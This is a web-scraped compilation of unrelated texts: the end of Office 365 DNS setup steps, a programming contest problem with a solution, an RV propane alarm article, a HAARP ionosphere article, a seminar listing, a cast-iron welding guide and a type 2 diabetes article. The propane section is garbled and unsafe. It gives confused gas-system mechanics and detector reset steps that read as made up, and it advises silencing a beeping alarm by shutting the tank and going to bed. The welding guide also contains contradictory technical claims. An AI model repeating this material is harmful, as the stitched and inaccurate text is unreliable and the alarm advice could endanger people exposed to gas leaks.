Important: Follow the procedure that you used for the other four CNAME records, but supply the values from the following pairs:
   - Create Subdomain: enterpriseregistration; Alias: enterpriseregistration.windows.net
   - Create Subdomain: enterpriseenrollment; Alias: enterpriseenrollment.manage.microsoft.com

Back to top

Add a TXT record for SPF to help prevent email spam

Important: You cannot have more than one TXT record for SPF for a domain. If your domain has more than one SPF record, you'll get email errors, as well as delivery and spam classification issues. If you already have an SPF record for your domain, don't create a new one for Office 365. Instead, add the required Office 365 values to the current record so that you have a single SPF record that includes both sets of values. Need examples? Check out these details and sample SPF records. To validate your SPF record, you can use one of these SPF validation tools.

Follow the steps below or watch the video (start at 5:09).

1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to log in.
2. Choose Manage domains.
3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain.
4. In the Domain Settings area, choose Edit DNS Settings.
5. In the TXT and SRV Records section, choose Add Record. (You may have to scroll down.)
6. In the Add Record area, in the boxes for the new record, type or copy and paste the values below. (Select the Type value from the drop-down list.)
   - Type: TXT
   - Prefix/Name: (Leave this field empty.)
   - Value: v=spf1 include:spf.protection.outlook.com -all (Note: we recommend copying and pasting this entry, so that all of the spacing stays correct.)
7. Choose Save.
8. Choose Save.
9. In the Edit DNS Settings dialog box, choose Yes.

Back to top

Add the two SRV records that are required for Office 365

Follow the steps below or watch the video (start at 5:51).

1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to log in.
2. Choose Manage domains.
3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain.
4. In the Domain Settings area, choose Edit DNS Settings.
5. In the TXT and SRV Records section, choose Add Record. (You may have to scroll down.)
6. Add the first of the two SRV records. In the Add Record area, in the boxes for the new record, type or copy and paste the values from the first row in the following table. (Select the Type and TTL values from the drop-down lists.)

   Type  Service           Protocol  Name             Host                     Priority  Weight  Port  TTL
   SRV   sip               tls       (Leave empty.)   sipdir.online.lync.com   100       1       443   3600 (1 h)
   SRV   sipfederationtls  tcp       (Leave empty.)   sipfed.online.lync.com   100       1       5061  3600 (1 h)

7. Choose Save.
8. Choose Save.
9. In the Edit DNS Settings dialog box, choose Yes.
10.
Add the other SRV record. In the TXT and SRV Records section, choose Add Record. In the Add Record area, create a record using the values from the other row in the table, and then again choose Add, Save, and Yes to complete the record.

Note: Typically it takes about 15 minutes for DNS changes to take effect. However, it can occasionally take longer for a change you've made to update across the Internet's DNS system. If you’re having trouble with mail flow or other issues after adding DNS records, see Troubleshoot issues after changing your domain name or DNS records.

Back to top

Still need help? Get help from the Office 365 community forums. Admins: sign in and create a service request, or call Support.
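Once the records have had time to propagate, you can spot-check them from any machine. The sketch below is not part of Microsoft's or 1&1's instructions; it uses the third-party dnspython package (resolve() requires dnspython 2.0 or later; older versions use query() instead), and example.com stands in for your own domain:

    # Spot-check the Office 365 DNS records described above (requires dnspython).
    import dns.resolver

    domain = "example.com"  # replace with your own domain

    # MX should point at <domain-key>.mail.protection.outlook.com, priority 10.
    for rdata in dns.resolver.resolve(domain, "MX"):
        print("MX:", rdata.exchange, "priority:", rdata.preference)

    # The SPF TXT record should contain include:spf.protection.outlook.com.
    for rdata in dns.resolver.resolve(domain, "TXT"):
        print("TXT:", rdata.strings)

    # Two of the CNAMEs created via the subdomain workaround.
    for sub, expected in [("autodiscover", "autodiscover.outlook.com"),
                          ("sip", "sipdir.online.lync.com")]:
        answer = dns.resolver.resolve(f"{sub}.{domain}", "CNAME")
        print(f"CNAME {sub}:", answer[0].target, "- expected:", expected)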
D. Bingo!

time limit per test: 1 second
memory limit per test: 256 megabytes
input: standard input
output: standard output

The game of bingo is played on a 5 × 5 square grid filled with distinct numbers between 1 and 75. In this problem you will consider a generalized version played on an n × n grid with distinct numbers between 1 and m (m ≥ n²). A player begins by selecting a randomly generated bingo grid (generated uniformly among all available grids). Then k distinct numbers between 1 and m will be called at random (called uniformly among all available sets of k numbers). For each called number that appears on the grid, the player marks that cell. The score at the end is 2 raised to the power of (number of completely marked rows plus number of completely marked columns).

Determine the expected value of the score. The expected score may be very large. If the expected score is larger than 10^99, print 10^99 instead (for example as "1e99" without the quotes).

Input
Input will consist of three integers n, m, k (1 ≤ n ≤ 300; n² ≤ m ≤ 100000; n ≤ k ≤ m).

Output
Print the smaller of 10^99 and the expected score. Your answer must be correct within an absolute or relative error of 10^-9.

Examples

Input
1 2 1
Output
2.5

Input
2 4 3
Output
4

Input
7 59164 40872
Output
3.1415926538
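A solution sketch (my own outline of one standard approach, not an official editorial): write R and C for the numbers of fully marked rows and columns, and expand 2^(R+C) = Π_r(1 + X_r) · Π_c(1 + Y_c), where X_r and Y_c are 0/1 indicators of a complete row or column. Taking expectations and using symmetry turns the problem into a double sum over how many rows i and columns j are forced to be fully marked; those cover c = n(i+j) - ij distinct cells, all of which land among the called numbers with probability Π_{t<c}(k-t)/(m-t). Working with logarithms avoids overflow:

    import math

    def expected_score(n, m, k):
        def log_c(a, b):
            # log of the binomial coefficient C(a, b)
            return math.lgamma(a + 1) - math.lgamma(b + 1) - math.lgamma(a - b + 1)

        # pref[c] = log P(c specific grid cells are all among the k called numbers)
        cmax = min(n * n, k)
        pref = [0.0] * (cmax + 1)
        for t in range(cmax):
            pref[t + 1] = pref[t] + math.log(k - t) - math.log(m - t)

        cap = 99 * math.log(10.0)  # clamp individual terms; the answer caps at 1e99
        total = 0.0
        for i in range(n + 1):
            for j in range(n + 1):
                c = n * (i + j) - i * j  # distinct cells in i rows and j columns
                if c > k:
                    continue  # more cells than called numbers: probability 0
                log_term = log_c(n, i) + log_c(n, j) + pref[c]
                total += math.exp(min(log_term, cap))
                if total >= 1e99:
                    return "1e99"
        return total

    print(expected_score(1, 2, 1))  # 2.5
    print(expected_score(2, 4, 3))  # 4.0

The first two sample inputs reproduce 2.5 and 4; meeting the full 10^-9 tolerance on the hardest inputs may need extra numerical care, so treat this as a sketch rather than a polished submission.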
[FIXED] Propane Alarm In Your RV

Why is my propane alarm going off in my RV?

Your RV propane system has a leak, or is not sealed properly. First turn off the gas at the tank and go outside to check that your connections are tight and nothing is leaking onto the ground. Make sure you have no gas inside of your coach. You should NEVER ignore a propane alarm going off! If it doesn’t stop after about 45 seconds, get out of your RV immediately and don’t go back inside until someone tells you everything is safe again.

Some common problems: a crack in a pipe joint seal, such as where a pipe enters an expansion valve, may cause the alarm activation. The crack will likely be gas filled. If the leak is in the vapor line, a slight amount of water or propane can cause a large release, which multiplies the effect of the leak and creates a greater than normal volume of hydrocarbon gas seeping into your coach. The repair will require replacing the part(s) that have cracks and/or resealing joints where cracking was found.

How does my RV’s propane system work?

When you turn on your propane range, oven or cooktop burner, propane entering through an intake regulator gets mixed with air, passes an electric solenoid valve, and is ignited to create heat for cooking. This same gas then travels out of your RV through the open pipe in the stove (the one you stick a match into when lighting) and eventually vents out of a vent pipe on the roof somewhere. The gas that is vented off from inside your RV is no longer really propane - after burning it is mostly water vapor and carbon dioxide. This open-flame path is also how your range, oven and cooktop light, because there are no batteries involved with these cooking appliances.

The same supply also feeds an outside tank line that serves all of the other appliances in your RV: refrigerator, furnace blower motor, furnace blower fan (forced-air heat), hot water heater, and so on. As needed, these appliances all have separate gas valves to direct the flow of gas into their respective systems.

There are also two types of propane appliances in your RV: storage and demand devices. Storage devices will hold a considerable amount of gas and use it up over time, while demand burners, such as your furnace blower motor or your hot water heater, only need a bit of gas at a time, so normally these have an open flame switch that turns on the flow for the exact amount needed at any given time (this is how you can tell if your hot water heater has been releasing small amounts of gas intermittently). These appliances would NOT require any vented pipe connection because they use very minimal amounts of propane quickly whenever they need it.

The propane tank(s) in your RV are usually located under the rearmost portion of your coach, and you may have one or more tanks if you have a large enough rig. Some people opt to install two tanks - one inside of the coach and another outside - just in case there is a leak in the line between the two. The gas from your propane tank(s) is delivered through a pressure regulator (the same kind used for natural gas) that reduces the system pressure to less than 10 psi. The gas then goes into an expansion valve that blows off any excess water vapor that has accumulated at this lower pressure setting.

How do you reset the Safe T Alert RV propane gas detector?
Step 1: If the Safe T Alert RV propane gas detector is in an area without any propane gas, set the detector to “HIGH STANDARD (5x)” by depressing the top button for a few seconds and then setting it to “HIGH STANDARD” with a downward press.

Step 2: If the Safe T Alert RV propane gas detector is in an area with propane gas, set the detector to “LOW STANDARD (1x)” by depressing the top button for a few seconds and then setting it to “LOW STANDARD” with a downward press.

Step 3: Press the down arrow until “RESET” is selected and then press the top button. The default reset time is set to 30 seconds, but it can be adjusted between 5 and 60 seconds by pressing the left or right arrows respectively. A lower number (5) gives a shorter response time, while higher values (60) allow for longer alarm times. When the desired value is displayed, press the top button again to confirm your selection.

Step 4: A series of dots will appear on the display to indicate that a new alarm has been entered, and you may choose another reset duration by following steps 2-3 above. To accept these changes, activate step 1 again if necessary.

Step 5: The Safe T Alert RV propane gas detector will now enter alarm mode immediately and will reset itself after the selected time passes.

How do I stop my RV propane alarm from beeping?

This can be accomplished by turning off the propane gas valve on the RV. The alarm should stop beeping when this is done. To turn off the propane gas valve, follow these steps:

1. Find the propane supply tank on your RV and open it up (usually there is a hose that can be detached from the top of the tank). You should see either an off/on switch or a large knob with an “OFF” label on it. The switch usually has two settings, one marked “ON” and another marked “AUTO”. In order to shut off the alarm, you have to turn this knob or push this button into the “OFF” position. Make sure that you turn off only THE PROPANE GAS TANK and not one of your stove burners, for example!
2. Close up the propane supply tank.
3. The propane gas alarm should stop beeping now and you can go to bed. Remember to turn on the supply tank again in the morning before you make that coffee!

Note: If your orange RV propane gas alarm won’t stop beeping after turning off the propane gas valve, then it is probably an electrical noise issue related to a ground loop or something similar. Unfortunately, there is not much you can do about such things besides moving your RV around so that this annoying electronic noise stops following you around everywhere!

What can set off a propane detector?

1. Acetylene torches
2. Acids
3. Alcohols, such as ethanol and methanol
4. Ammonia, bleach, biological detergents (soaps), cleaning fluids and solutions containing ammonia or chlorine
5. Antifreeze products - ethylene glycol antifreezes can damage a gas detector unit because of their high alcohol content
6. Hair spray
7. Cleaning chemicals

When should you clean your propane detector?
__label__pos
0.982559
HAARP, the most powerful ionosphere heater on Earth Last Updated: February 6, 2024By HAARP, the most powerful ionosphere heater on Earth When stimulated with high-intensity radio waves, the ionosphere responds with baffling and beautiful displays. Our modern world of Wi-Fi, smartphones, and location apps relies on radio waves to link up all our gadgets. Most of us, though, are unaware that the ionosphere high above Earth affects the location services in our phones and the directions relayed by the navigation units in our cars. The complex dynamics of the ionospheric plasma, a gas of electrons and ions enveloping our planet, can be studied by research facilities such as the High Frequency Active Auroral Research Program (HAARP), located in Alaska. During the past 15 years, HAARP has produced many interesting and unexpected results, perhaps most spectacularly the production of an artificial ionospheric plasma generated by radio waves. The ionosphere is the region of the upper atmosphere characterized by a large population of free electrons and ions—the atmospheric shrapnel that arises when UV photons from the Sun knock electrons from atmospheric gas. (For a tour of the upper atmosphere, see the Quick Study by John Emmert, Physics Today, December 2008, page 70.) Its density is controlled by the relative rates of ion production and the recombination of ions with electrons to re-create neutral molecules. The ionosphere begins at an altitude of about 70 km, reaches a peak daytime density of something like a million particles per cubic centimeter near 250 km, and tapers off above that altitude to blend into the much more rarefied plasmasphere, magnetosphere, and solar wind. The ionospheric plasma can distort and delay satellite communications and navigation signals passing through it; indeed, the primary practical motivation for studying the ionosphere is to get a handle on those effects. At the low power of day-to-day devices, the ionospheric plasma can alter radio waves, but the plasma itself is unaffected. At high enough power densities, however, radio waves can affect the plasma and generate feedback between the waves and plasma, a phenomenon that offers a unique means—so-called ionospheric heating—of studying the ionosphere. The HAARP facility began operating in 1999 with a 6 × 8 array of transmitting antennas that, in total, produced 960 kW of RF power—about the same as generated by 10 AM radio stations. (The figure shows today’s 12 × 15 array.) The HAARP beam is broad like a flashlight’s, not narrow like a laser’s, but it can be electronically steered anywhere within 30° of zenith—that is, local vertical—and it can operate at 3–10 MHz. Its powerful radio waves drive ionospheric electrons back and forth in what are called plasma waves. As those driven electrons collide with each other and with background species, their temperature goes up, which is why HAARP is called a heater. Heating and observing the ionosphere. Generators at the High Frequency Active Auroral Research Program (HAARP) operations center in Alaska (buildings to the upper left) feed power to the large antenna array to the right. That array, in turn, transmits RF waves that interact with the ionosphere. Shelters down the road from the array house optical instruments for observing the resulting excitations; one of the instruments is visible through the clear dome in the lower inset. (Backdrop photo by A. Lee Snyder; inset photo by Robert Esposito.) 
The red and green regions in the upper inset (courtesy of Jeffrey Holmes) represent regions of the ionosphere in which oxygen atoms excited by ionospheric heating relax to lower-energy states. Behind the HAARP site rises Mount Drum. Just as an opera soprano needs to sing at just the right frequency to break a glass, so a heater must target frequencies that match the natural plasma resonances in the ionosphere. Primary targets include the plasma frequency, a function of electron density; multiples of the cyclotron frequency of electrons spiraling around the magnetic field; and hybrid resonances that combine those fundamental frequencies. Measurements of optical emissions excited by heated electrons yielded HAARP’s first unexpected result. Spotting such emissions at all was a feat, inasmuch as 20 years of attempts to do so at the EISCAT (European Incoherent Scatter) heater in Norway’s Arctic had been unsuccessful; in fact, HAARP scientists had been warned that looking for optical emissions would be a waste of time. Nevertheless, images recording the red 630.0-nm oxygen line revealed a faint blob turning on and off in sync with the heater; that could only mean HAARP had heated the electrons and excited the oxygen. The airglow showed an unexpected enhancement well away from the beam center, at the magnetic zenith—that is, the direction of the magnetic field. The obvious next step was to point the beam toward the magnetic zenith, which at HAARP is about 15° south-southwest of vertical. When the experiment was finally performed in 2002, as the HAARP array swung the beam through the magnetic zenith, the blob lit up and was 10 times as bright as airglow in any other location. A variation of that magnetic zenith effect had been previously observed at EISCAT, but neither the EISCAT nor HAARP version of the effect had been predicted and neither is fully understood. Thanks to its frequency agility, the HAARP antenna can heat the ionosphere at specific altitudes where the transmission frequency simultaneously matches two resonances. In 2004, experiments exploiting that possibility produced green-line oxygen emissions at 557.7 nm. (The figure shows an airglow with red and green oxygen emission.) Those lines come from an excited state with an energy 4 eV above the ground-state energy; evidently, by “surfing” plasma waves, the electrons accelerated to energies well beyond the thermal energy. Another HAARP experiment in the same series heated an ephemeral ionospheric layer produced by an aurora; the resulting green spots were as bright as the aurora itself. Those extremely bright spots have since been reproduced but are not yet explained. In 2007 HAARP expanded to its full design capability of 12 × 15 antennas and 3.6 MW of total power. During its first postexpansion science campaign, in February 2008, my colleagues and I obtained optical images with strange, unpredicted rings around the airglow spot. We hypothesized that if the plasma in the center of the beam were slightly enhanced in density relative to the background ionosphere, the density gradient could divert rays away from the center of the beam toward the location where the ring was observed. Careful examination of echoes from radio waves bounced off the ionosphere turned up evidence for a density-enhancing artificial plasma layer just below the natural ionosphere. Moreover, simulations of RF waves propagating through the observed layer put additional power right where the rings were seen. 
We had not expected such artificial ionization to be possible, but we followed up with new experiments designed to optimize ionization production. In March 2009, just over 10 years after we were told that looking for airglow was futile, I stepped outside with a couple of coworkers during an ionization experiment and marveled at the light—visible with unaided eyes—from an artificial ionospheric plasma produced and sustained by radio waves transmitted from the ground. In addition to generating unexpected phenomena, HAARP scientists used and further developed a diagnostic technique pioneered at EISCAT: stimulated electromagnetic emissions. The effect arises when plasma waves stimulated by the heater regenerate radio waves that are received on the ground as a complex spectrum of narrow peaks and broad bumps on either side of the transmission frequency. Some of those depend not only on electron density but also on ion mass, magnetic field strength, or other parameters. Thus the stimulated emissions provide a potentially powerful tool for analyzing conditions in the heated volume. Admittedly, research at HAARP has not directly contributed to new corrections for ionospheric effects on navigation or communications systems. Instead, the many surprises encountered in HAARP experiments have made abundantly clear the need for quantitative predictive theory and modeling in the field of high-power RF-wave propagation. The complex equations describing plasma waves imply a whole zoo of wave modes that could potentially be excited by a transmitter. But no one can predict with certainty whether a particular wave mode will absorb half the transmitted energy or only one part in a million. For example, observed artificial plasma production accounts for only about 5% of the energy available from the beam; some of the remaining 95% undoubtedly excites other modes that might mislead researchers into wrongly identifying the cause of the ionization. Stimulated electromagnetic emissions hold the greatest promise for helping scientists determine which wave modes are active during actual experiments. An interesting and still unexplored aspect of artificial ionization is the complex interplay between the plasma created by radio waves and the bending or reflecting of radio waves by that plasma. As food for thought, have a look at the video that accompanies the online version of this Quick Study. You’ll see a wide range of spots, turbulence, and sharp gradients—despite the smoothly varying beam. If we are ever to develop practical applications of heating technology, we’ll need to find mathematical solutions describing the evidently complex feedback process. In August 2015 the HAARP facility was transferred from the US Air Force to the University of Alaska so that HAARP scientists could continue their investigations of fundamental plasma physics in an academic environment. editor's pick latest video
__label__pos
0.783224
Loading Events This event has passed. alan pepper out in a field with plants to collect Alan Pepper Department of Biology, TAMU Title: “Between a rock and a hard place: Evolutionary adaptation to an extreme terrestrial environment” Abstract: Evolutionary adaptation to environment is a fundamental attribute of all living things. Because plants are sessile (immobile), they cannot seek out a new environment in the face of challenging conditions, and thus make excellent organisms for both laboratory and field studies of environmental adaption. The focus of my lab is the study of the genetic mechanisms of plant adaptation to ultramafic or ‘serpentine’ geological outcrops. Derived from highly unusual surface exposures of the Earth’s mantle, serpentine outcrops are globally rare, and are characterized by high levels of toxic heavy metals such as nickel, chromium and cobalt. They also have very low levels of essential mineral nutrients including nitrogen, phosphorous, potassium, calcium and sulfur. The resulting ‘serpentine barrens’ also have low levels of organic matter and are prone to drought. Only a very few plants have evolved to thrive in these conditions. In this seminar I will a describe a highly- tractable model system built from two ecologically contrasting populations of the rare annual plant Caulanthus amplexicaulis (Brassicaceae). Using an array of genetic and genomic approaches, this model has led to advances in our understanding of adaptation to the complex and harsh serpentine environment. A fundamental question of our work is that of how organisms simultaneously adapt to multiple serious environmental challenges. In this regard, our presentation will focus on the potential adaptive roles of transcription factors, pleiotropic genes (that act in multiple biological pathways), and loss-of-function mutations (that occur at high frequency). These findings will allow us to model and predict evolutionary responses to complex environmental challenges such as those posed by climate change. Host: Deb Bell-Pedersen
__label__pos
0.96272
Welders Galore Welders Galore Ultimate Guide on How to Weld Cast Iron Welding cast iron has the reputation of being a difficult task to perform. Although it is possible, how do you weld cast iron. It is a problematic material to weld due to the high carbon content that makes it brittle and highly prone to cracking. It is doable and there are ways to make it work. Let’s look into the details, including the best welding process and the best way to weld cast iron. Is it Hard to Weld Cast Iron? Welding Cast Iron In short, this is not a straight ahead job for anyone really, but even more difficult for the beginner welders. Cast iron is an alloy of iron, 2-4% carbon, and varying amounts of other metals such as silicon, manganese, and traces of sulfur and phosphorus. The metal is generally brittle, but the type of cast iron will determine whether it’s weldable or not. After reading this article you will be at least better informed of how to go about this tricky, but not impossible, process. Types of Cast Iron Below is a brief description of the most common forms of cast iron, including their properties that determine the welding process. Gray Iron This is the most common form of cast iron used throughout the world. It is called “Gray Iron” because of it’s graphite flaky structure. While it is more ductile than White Cast Iron it is still not easy to weld and requires some special techniques to be successful. The major challenge for welders is the possibility of causing a weld metal embrittlement (process of making it brittle) when the graphite flakes enter the weld pool during the welding process. White Cast Iron White cast iron is almost unweldable thanks to carbon making up most of its form. It retains the cementite crystalline structure making white cast iron super hard and brittle. It has very high resistance to abrasion and very good compressive strength but this also makes it difficult to machine and cut. Malleable Cast Iron Malleable Cast Iron is a product of white iron after some serious heat treatment and left to cool slowly thus changing the composition of the metal. It is similar to ductile cast iron in that it is more pliable and user friendly when it comes to welding. Ductile Cast Iron Ductile cast iron, also known as ductile iron, was created in 1943. The definition of “Ductile” is pliable and not brittle. In short ductile cast iron is comprised of a higher percentage of carbon making it more flexible than the standard cast iron or gray iron, which consequently makes ductile cast iron more machinable and weldable. The Best Ways to Identify Different Cast Irons • Consulting the manufacturer, not always convenient to do this method. • Checking the color on the crack. Grey iron will show grey while white iron is brighter along the fracture. • Spark test, each type will give off different shapes and colors of sparks when grinding. This is the most popular method of identifying what type of cast iron you are dealing with. • Use a metal file to make a deep mark in the metal, may need some experience here. Steps to Weld Cast Iron Once you have identified the particular type of cast iron you are working with, there are some simple general pre-welding steps to follow. 1. Cleaning the cast iron. 2. Choosing the correct pre-heat temperature. 3. Selecting the right welding technique. Step 1. Cleaning the Welding Area As with most metals you always will want to start with a clean surface and cast iron is no different. This means things like rust and other impurities on the iron. 
You need to be careful that the target area is perfectly dry of all types of foreign materials including water, oils or grease. You will also need to go in with mineral spirits to remove any surface graphite before welding. Pre-heating the welding area will ensure any entrapped gases are released before the welding process begins. Step 2. Choosing the correct pre-heat temperature Learning proper heating and cooling control is a crucial skill to have under your belt before attempting to weld cast iron. It’s an important step to prevent stress cracking and minimize any residual stress build-up that may lead to cracking. When a metal is heated, it expands. If the metal is uniformly heated, no stress would be caused, but localizing the heat in a small region causes stress build-up, leading to cracking. Ductile metals can handle it by stretching from the stress, but cast iron has low ductility meaning it will crack. Pre-heating reduces the thermal gradient between the cooler surrounding area and the target area. If possible, heat up the whole casting but if not, heat up as large an area as possible. Steps in Welding Cast Iron Preheat the iron to 500-1200 degrees Fahrenheit to minimize internal stresses in the material. You can use an infrared thermometer or observe when the metal starts glowing dull red, which happens at around 900 degrees Fahrenheit. Perform the welding in a dark room so you can notice when the target area starts glowing. Allow it to just glow so then you know that you have achieved the right temperature for welding. Minimizing the heat during the actual welding process is the next best strategy when pre-heating is not possible. This may require you to stop and start a few times to prevent over heating the welding area. Welding cast iron at high temperatures is a recipe for disaster. In the past I have used different ways of pre heating cast iron before welding. You could simply use an electric heat gun or if it is a hot day just leave the job in the sun for awhile. Anything to heat the metal is better than leaving it cold. Step 3. Selecting the right Welding Technique Choosing the right welding technique comes down to preference, provided it’s suitable for the alloy being welded. You also need to choose the best filler. The most common welding techniques are stick, TIG, MIG, and oxy-acetylene welding. What is the Best way to Weld Cast Steel? Once you have cleaned the metal, the crack will be visible as a dark line. Drill a hole on either end of the crack to prevent the crack from extending. Failure to drill on both ends of the crack creates the possibility of cracking as you weld, or the part will break over time. I also recommend to create a small channel in the metal to hold the weld by using an angle grinder. Caution: do not cool the finished product by immersing into water! This will instantly create a major crack. How to Weld Cast Iron Using Different Types of Welders The kind of welder to use will be determined by the surface you are welding, and the end result expected. For instance, if you are welding a machined surface, you would use the TIG weld as a spatter from the stick, and MIG welding would cause unnecessary damage to the surface. 1/ Stick Welding Also known as metal arc welding (MMA), this method uses an electrode covered with flux, and it’s the best welding process for cast iron. The electrode required will depend on its application, color match required, and the machining to be done post welding. 
The main types of electrodes used are iron, nickel, or copper-based. Nickel-based electrodes are the most popular for cast iron welding as they are stronger, therefore reducing the resistance to cracking. The process involves melting an electric arc between the electrode and the welding area. Ensure the arc is directed towards the weld pool to minimize dilution that would occur when directed toward the base metal. You should also use the lowest setting to reduce heat stress and avoid damaging the metal. 2/ Oxy-acetylene Welding This process uses an electrode, but instead of an electric current, the method utilizes oxy-acetylene to generate heat. The slow heating and low amount of heat used in the process results in a large HAZ (heat affected zone), so care must be taken to avoid oxidizing the cast iron. The rod should be welded in the molten pool rather than directly by the flame. 3/ Braze Welding Brazing is commonly used for welding cast iron parts as it causes minimal impact on the base metal. The process involves using a filler with a lower melting point than cast iron. The filler, therefore, adheres to the surface of the cast iron rather than diluting into the weld pool.  For this technique to work seamlessly, you need to start off with a clean surface. You can also use flux to prevent oxidizing and promote the wetting of the surface. 4/ TIG Welding TIG welding is generally not recommended due to the highly localized heating characteristics. The skills of the welder also determine the overall outcome of this welding technique. Frequently Asked Questions about How to Weld Cast Iron How can I weld cast iron exhaust manifold? The key to welding a cast iron exhaust manifold is to go low and slow to avoid creating stress that will lead to cracking. What kind of welding rod do you use on cast iron? Nickel alloy rods are the most popular for welding cast iron. They are stronger with a low thermal coefficient which reduces welding stress. Can cast iron be welded to steel? It’s possible but not recommended due to the differences in these metals’ chemical and mechanical properties. For instance, steel has higher tensile strength than cast iron, meaning it can withstand pressure before cracking, but cast-iron cracks under stress. How do you weld cast iron without cracking it? It’s recommended to preheat the surface you want to work on or use minimal heat where preheating is not possible. ConclusionHow to Weld Cast Iron While welding cast iron is challenging, it’s possible as long you understand the properties of cast iron. The welder also needs to undertake the process with utmost care to avoid cracking. Pre and post-weld heating is a must, and high heat is a no-no during the welding process. Finally, always start with a clean surface. Scroll to Top
__label__pos
0.883809
All main services are operating. Click here for more information. your discount will be applied at checkout your 10% discount will be applied at checkout OFFER ENDS TODAY! What Is Type 2 Diabetes And Is It Preventable? Type 2 diabetes is mainly caused by a poor lifestyle such as a bad diet and lack of exercise. So how can you prevent or even reverse it? Is prediabetes preventable? Type 2 diabetes is becoming increasingly common, mainly because of an increase in sedentary lifestyles and the prevalence of obesity. So, how can you prevent it and is prediabetes diagnosis reversible? What Is Type 2 Diabetes? Type 2 diabetes is when the body is unable to control the level of glucose in the blood resulting in high blood sugar levels. What Causes Type 2 Diabetes? Type 2 diabetes is caused when the body is unable to make enough of the hormone known as insulin, or the insulin doesn't work properly so blood sugar levels keep rising. Insulin is made by the pancreas and it releases the hormone insulin in response to rising blood glucose levels. When we eat, the glucose in our food is absorbed into the bloodstream. The release of insulin allows the circulating glucose to be taken up by our cells, that use it for energy. As a result, the release of insulin slows down and the blood glucose levels return to normal. In people with type 2 diabetes, the pancreas can become worn out as a result of insulin not working properly or less insulin being produced by the body.  This leads to high higher blood sugar levels.  This puts some people with type 2 diabetes at risk of hyperglycaemia if the condition is not managed. According to Diabetes UK approximately 90% of people in the UK with diabetes have type 2 which is a serious condition, lifelong condition.  However, it is preventable. Type 2 diabetes can be caused by: • The pancreatic beta cells having trouble producing insulin. So, they may produce some, but not enough to meet the body’s needs; or • The insulin doesn’t work as expected. In this case, insulin receptors are insensitive and don’t respond to the insulin in the bloodstream, so blood glucose levels remain high. Complications Of Type 2 Diabetes Prolonged increases in blood glucose levels are harmful to the body, particularly the blood vessels. When the blood vessels become damaged, blood is unable to travel effectively around the body, so vital nutrients and oxygen may not reach these parts. Consequently, nerves can also become damaged and when both blood vessels and nerves are damaged in one area of the body, complications can arise. Complications of type 2 diabetes include: • Eye problems • Heart attacks • Kidney problems • Nerve damage • Foot problems What's The Difference Between Type 1 and Type 2 Diabetes? Type 1 diabetes is when your body attacks the cells in your pancreas preventing it from producing insulin which controls your blood sugar levels.  Whereas type 2 diabetes is when the body is unable to make enough insulin.  It is not known what causes type 1 diabetes but symptoms develop much more quickly than type 2 diabetes. Type 2 Diabetes Risk Factors Lifestyle plays a part in type 2 diabetes and being overweight is considered a risk factor, along with age, ethnicity and high blood pressure.  Having a parent or sibling with diabetes also increases your risk of developing type 2 diabetes.  
Key risk factors are: • Age - those 40+ years of age (25+ years of age for south Asian people) • Weight gain and obesity, especially around the middle • Being of Asian, African-Caribbean or black African ethnicity • Having a close family member with diabetes • High cholesterol and triglycerides • Hypertension (high blood pressure) “Being overweight is the most significant risk factor for developing type 2 diabetes and is associated with 80% to 85% of risk.”, Emma Elvin, Senior Clinical Advisor at Diabetes UK. Type 2 Diabetes Symptoms Type 2 diabetes symptoms can be tricky to identify as they develop slowly over time, however, symptoms include: • Increased thirst • Tiredness/fatigue • Unexplained weight loss  • Needing to urinate more frequently, particularly at night • Itchy penis or vagina, or getting thrush more regularly • Wounds and cuts taking longer to heal • Blurred vision Is Type 2 Diabetes Reversible? Type 2 diabetes is a lifelong condition and needs to be managed through diet, exercise and medication.  However, according to Diabetes UK, type 2 diabetes can be put into remission by losing weight and following a low-calorie diet as prescribed by your healthcare professional.  Surgery is also an option for some people to put type 2 diabetes into remission.   What Is Prediabetes? Prediabetes isn't a condition but a term used to describe high blood glucose levels.  Levels have to be higher than the normal range but not yet high enough to diagnose type 2 diabetes.  It is estimated that one in three adults in England have prediabetes. “Prediabetes is a term that some healthcare professionals use to describe when your blood glucose levels are higher than normal, but not high enough for you to be diagnosed with Type 2 diabetes. Prediabetes isn’t a clinical term that is recognised by the World Health Organisation, but some healthcare professionals use it to help them explain that someone is at increased risk of Type 2 diabetes”, Emma Elvin, Senior Clinical Advisor at Diabetes UK. The best way to identify prediabetes is with a blood test that measures HbA1c.  Unlike blood glucose tests which measures blood sugar levels at the time of the test, HbA1c blood tests provide an average measurement of blood sugar levels over the last 2-3 months.  This means it's a much better way to identify prediabetes and to monitor type 2 diabetes. As prediabetes predisposes individuals to type 2 diabetes and is a critical stage in its development, it's good to understand if it can be reversed. Is Prediabetes Reversible? Yes. Type 2 diabetes itself is a preventable disease. In many cases, it develops because of a poor lifestyle. Therefore, as prediabetes is an indicator of impending type 2 diabetes, it can be reversed by making lifestyle changes. Lifestyle Changes To Prevent Type 2 Diabetes Making some simple changes to your lifestyle can reduce the risk of developing type 2 diabetes significantly as well as reversing prediabetes and also putting type 2 diabetes into remission. Therefore, the following lifestyle changes can help to reduce your overall risk: • Weight loss • Reducing alcohol intake • Quitting smoking • Exercise How Your Diet Can Help Prevent Type 2 Diabetes Diet is a major risk factor for the development of type 2 diabetes. Convenience foods such as ready meals, fast food and fizzy drinks are thought to be major contributors because they have high sugar, salt and saturated fat contents. However, you can reduce your chances of developing type 2 diabetes by making changes to your diet. 
Diets which don’t cause your body to produce lots of insulin are particularly beneficial: • Reduce your carbohydrate intake or choose healthier options: • Wholegrain bread, pasta • Oats • Brown rice • Incorporate as many fruits and vegetables as you can into your diet • Swap snacks like cakes, sweets and crisps for food such as fruit, nuts and seeds • Cut out sugary drinks • Aim for 2 portions of oily fish per week • Mackerel • Salmon • Tuna • Sardines • Herring • Avoid processed foods • Takeaways • Fast food • Processed ready meals Alcohol contains a lot of calories and so it increases your chance of obesity which is a risk factor for type 2 diabetes. Plus, alcohol is responsible for reducing the body’s sensitivity to insulin, a cause of type 2 diabetes. Therefore, although you shouldn’t need to give up drinking alcohol entirely, you should limit your intake. Current advice is no one should drink more than 14 units of alcohol per week. Exercise And Preventing Type 2 Diabetes A great way to naturally lower your blood sugar levels is exercise. Exercise reduces the amount of glucose in the blood because muscles can use it as an energy source, even if there is little or no insulin present. Aerobic exercise at a moderate to vigorous intensity has long been recommended to prevent the development of conditions such as obesity and type 2 diabetes. The body’s insulin sensitivity can be improved after just one week of aerobic exercise. Adults should 